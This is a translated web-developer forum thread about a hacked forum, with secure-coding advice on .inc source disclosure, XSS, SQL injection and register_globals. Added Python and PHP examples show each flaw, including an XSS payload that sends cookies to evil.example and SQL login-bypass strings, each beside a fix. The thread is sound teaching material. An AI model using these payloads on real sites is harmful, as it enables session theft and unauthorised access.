#1 | Web developer (Join Date: 09 2002, Location: Yerevan, Age: 40, Posts: 896)
#2 | Магистр (Master) (Join Date: 02 2002, Location: Am, Posts: 952)

But whatever, LOL. My Expo got broken into 3-4 times in a row by one and the same jerk.. I just don't feel like getting involved with idiots, otherwise I could easily have gotten the IP from Arminco and hung some p**j on him.. so just restore the old version and change the passwords..
#4 | Web developer (Join Date: 09 2002, Location: Yerevan, Age: 40, Posts: 896)

2 Arik: This just means that ready-made products simply can't be used; everything has to be written yourself...
2 DolphiN: IIS, like Apache, like the other web servers, requires proper configuration. They all have their minuses and pluses, and all of them can be broken into. In this case I can't do anything, since the hosting isn't mine. And by the way, what does IIS have to do with it, when only the forum was broken into???
#6 | Главный Лысый (Chief Bald One) (Join Date: 10 2001, Location: AM, Age: 43, Posts: 2,829)

Arik, often the problem is not the passwords or the web server settings. The simplest example: if your application keeps part of its code in .inc files, and the web server isn't configured to refuse serving those files without parsing them, then anyone can request the URL of such a file and see its source. BTW, that is exactly the situation on Arminco's hosting.....
And a small IMHO. If you've been broken into, first find out how it was done, and only then restore from backups.
Regards
__________________
Ruben Muradyan, Technical Director, PanARMENIAN Network: Armenian News
----------------------------------------------------
A bald patch is a clearing trampled by thoughts.
----------------------------------------------------
#7 | Главный Лысый (Chief Bald One) (Join Date: 10 2001, Location: AM, Age: 43, Posts: 2,829)

Quote: This just means that ready-made products simply can't be used; everything has to be written yourself...

There are a few nuances here.
1. I fully agree with that statement, though not for security reasons......
2. You have to write very carefully. And I strongly recommend having a competent sysadmin on the team. The thing is, most mistakes show up at the level of checking conformance to standards. A simple example: on one web server all .html files are parsed by php regardless of whether the file contains php code or not. On the one hand it's convenient. On the other hand the "Last-Modified" header isn't sent, and a lot more traffic is generated.....
3. If the team is large, have at least one person who does a security audit of the code....
4. Read whitepapers carefully. A huge number of sites are vulnerable to Cross-Site Scripting type errors.
5. If the server administrator is unreachable (hosting), study the server configuration carefully and write in accordance with it. In the case of arminco: don't keep pieces of code in .inc files, rename them to .php.
6. Subscribe to the relevant mailing lists, because new vulnerabilities keep appearing......
That's about it.
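The .inc disclosure described in #6 and the rename-to-.php advice in #7 (item 5), as an added Python example that is not code from the thread: a small audit script that walks a document root and lists every file which contains PHP code but whose extension the server would not pass to the parser, so a visitor could read its source by requesting the URL. The extension list, the sample files and the values in them are constructed assumptions, not anything from the hosting discussed above.

```python
"""Audit a document root for include files that the web server would serve
as plain text.  Added example, not code from the thread; the sample tree
and the extension list are constructed here for illustration."""
import os
import re
import tempfile

# Extensions the (hypothetical) server passes to the PHP parser.  Anything
# else is served verbatim, which is the situation described for .inc files.
PARSED_EXTENSIONS = {".php", ".php3", ".phtml"}

# PHP open tags (<?php, <?=, or a bare <? followed by whitespace).  A raw
# file containing one of these would disclose source to anyone requesting it.
PHP_TAG = re.compile(r"<\?(php\b|=|\s)", re.IGNORECASE)


def served_raw(filename, parsed_exts=PARSED_EXTENSIONS):
    """True if the server would hand this file out unparsed."""
    _, ext = os.path.splitext(filename)
    return ext.lower() not in parsed_exts


def find_exposed_includes(root, parsed_exts=PARSED_EXTENSIONS):
    """Return relative paths of files that contain PHP code but would be
    served raw, i.e. whose source a visitor could read via the URL."""
    exposed = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not served_raw(name, parsed_exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                if PHP_TAG.search(fh.read()):
                    exposed.append(os.path.relpath(path, root))
    return sorted(exposed)


def build_sample_tree():
    """Create a constructed document root in a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="docroot_")
    files = {
        # The pattern the thread warns about: code kept in a .inc file.
        "config.inc": "<?php $db_pass = 'hunter2'; ?>\n",
        # The recommended fix: same content renamed so the parser handles it.
        "config.inc.php": "<?php $db_pass = 'hunter2'; ?>\n",
        # Static HTML with no code is harmless to serve raw.
        "index.html": "<html><body>hello</body></html>\n",
        # Any other extension holding code is exposed just like .inc.
        "lib/db.txt": "<?\nfunction connect() {}\n?>\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for rel in find_exposed_includes(root):
        print("exposed source:", rel)
```

Run it against a real document root by calling `find_exposed_includes("/path/to/htdocs")` with the extension set your server actually parses; the renamed `config.inc.php` is the only copy of the secret that stays hidden.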
#8 | Web developer (Join Date: 09 2002, Location: Yerevan, Age: 40, Posts: 896)

2 Pascal: Thanks for the detailed information. I think all config files should be kept in *.inc.php (asp) files. Could you explain what "Cross-Site Scripting" is?
#10 | Главный Лысый (Chief Bald One) (Join Date: 10 2001, Location: AM, Age: 43, Posts: 2,829)

"What is Cross Site Scripting?"
Cross site scripting (also known as XSS) occurs when a web application gathers malicious data from a user. The data is usually gathered in the form of a hyperlink which contains malicious content within it. The user will most likely click on this link from another website, web board, email, or from an instant message. Usually the attacker will encode the malicious portion of the link to the site in HEX (or other encoding methods) so the request is less suspicious looking to the user when clicked on. After the data is collected by the web application, it creates an output page for the user containing the malicious data that was originally sent to it, but in a manner to make it appear as valid content from the website.

A short explanation of XSS mistakes made by web application programmers is here: http://www.cert.org/archive/pdf/cros..._scripting.pdf
And here is a description of errors of this type made by the server developers:
http://www.kb.cert.org/vuls/id/520707
http://www.cgisecurity.com/archive/w...2.0.43-xss.txt
Here is a guide to writing secure web applications. IMHO this thing should be printed out and read like the Bible:
http://online.securityfocus.com/data...vices-V1.0.pdf
And in general http://www.cgisecurity.com/
Regards
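The reflected case the FAQ above describes, as an added Python example (not from the thread or the linked papers): a search page echoes its `q` parameter, the attacker percent-encodes the payload so the link looks harmless, the server decodes it, and without output escaping the script tag lands in the page. The site URL, page template, parameter name and payload are all constructed for illustration.

```python
"""Reflected XSS: a search page echoes a query parameter.  Added example, not
from the thread; the page, parameter name and payload are constructed here."""
import html
from urllib.parse import urlsplit, parse_qs, quote

# Constructed page template; {q} is where the untrusted value is inserted.
PAGE = "<html><body><p>Results for: {q}</p></body></html>"


def query_param(url, name):
    """Decode the named parameter from a link the way the application would:
    percent-encoding (the 'HEX' the FAQ mentions) is undone at this point."""
    values = parse_qs(urlsplit(url).query).get(name, [""])
    return values[0]


def render_vulnerable(url):
    """Echo the parameter unescaped: whatever the link carried becomes HTML."""
    return PAGE.format(q=query_param(url, "q"))


def render_safe(url):
    """Same page, but the untrusted value is HTML-escaped before insertion,
    so < > & " ' become entities and cannot open a tag or attribute."""
    return PAGE.format(q=html.escape(query_param(url, "q"), quote=True))


def build_attack_link(base, payload):
    """Percent-encode every non-alphanumeric byte of the payload so the link
    shows no angle brackets; the server decodes it back before echoing."""
    return base + "?q=" + quote(payload, safe="")


# Constructed payload: ship the victim's cookie to an attacker-controlled host.
PAYLOAD = "<script>document.location='http://evil.example/?c='+document.cookie</script>"
ATTACK_LINK = build_attack_link("http://forum.example/search.php", PAYLOAD)

if __name__ == "__main__":
    print(ATTACK_LINK)
    print(render_vulnerable(ATTACK_LINK))
    print(render_safe(ATTACK_LINK))
```

The point of the two renderers is that the fix lives on the output side: the decoded value is identical in both, and only the escaping decides whether the browser sees text or a script.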
#11 | Профессор (Professor) (Join Date: 01 2002, Location: New York, USA, Posts: 2,938)

Ghazanchyan, why didn't you apply bug fixes in time????? The bug that the Istanbul puppies are using is at least 4 months old. Read the snitz forum and then change your password...
2 Arik: you've been broken into 3 times, and you aren't even interested in why??????
#13 | Главный Лысый (Chief Bald One) (Join Date: 10 2001, Location: AM, Age: 43, Posts: 2,829)

groul, I gave an example....
The thing is, very few web developers take measures to secure their sites.... XSS is the classic mark of an inattentive programmer.....
#14 | Профессор (Professor) (Join Date: 01 2002, Location: New York, USA, Posts: 2,938)

SQL injection too. All it takes is doing server-side validation carefully... By the way, about a year ago I was writing a user authentication system and started looking at various articles on the web. Of the 7 articles I read, 5 didn't have a word about validation (and the people who wrote them were supposedly experienced programmers already). What does that mean? It means that in reality 60% of mid-level sites can be "taken down" just because of an incorrectly implemented validation mechanism...
__________________
Karen Vrtanesyan, աջակցող (supporter), ArmenianHouse.org - Armenian Library and Forum. Literary Cafe - Young Armenian writers and poets
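The SQL injection and server-side validation point in #14, as an added Python example (sqlite3; not the thread's own code): the same login check written once by pasting request values into the query text and once with bound parameters, run against a constructed users table with the two classic payloads. The table, the account and the payload strings are constructed for illustration.

```python
"""Login query built by string concatenation versus a parameterised one.
Added example, not from the thread; the table and account are constructed."""
import sqlite3


def make_db():
    """In-memory users table with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'mypass')")
    conn.commit()
    return conn


def login_vulnerable(conn, login, password):
    """Classic mistake: request values are pasted into the SQL text, so a
    quote character in them changes the query instead of being data."""
    sql = ("SELECT COUNT(*) FROM users WHERE login = '%s' AND password = '%s'"
           % (login, password))
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn, login, password):
    """Same check with bound parameters: the driver keeps the values as data,
    so a quote in the password is just a quote.  This is the server-side
    handling the post says is so often missing."""
    sql = "SELECT COUNT(*) FROM users WHERE login = ? AND password = ?"
    return conn.execute(sql, (login, password)).fetchone()[0] > 0


# Constructed attack inputs.
OR_TRUE = "' OR '1'='1"      # makes the WHERE clause always true
COMMENT_OUT = "admin' --"    # ends the login literal and comments out the rest


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "admin", "mypass"))     # True  (legitimate)
    print(login_vulnerable(db, "anything", OR_TRUE))   # True  (bypassed)
    print(login_vulnerable(db, COMMENT_OUT, "wrong"))  # True  (bypassed)
    print(login_safe(db, "anything", OR_TRUE))         # False
    print(login_safe(db, COMMENT_OUT, "wrong"))        # False
```

Escaping quotes by hand is the usual half-fix and still breaks on encoding and numeric contexts; binding parameters removes the whole class, which is why the safe version needs no validation of the password string at all.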
#15 | Консервативн (Conservative) (Join Date: 01 2002, Location: Кавказская Албания (Caucasian Albania), Posts: 889)

My 2c. Another fairly common authentication mistake:
Code:
<?php
// $auth is never initialised to 0 before the check below.
if ($login == "admin" && $pass == "mypass") $auth = 1;
// ...
// With register_globals=On, a request such as ?auth=1 creates $auth
// before this line runs, so the admin branch opens without the password.
if ($auth) {
    /* ADMIN STUFF */
}
?>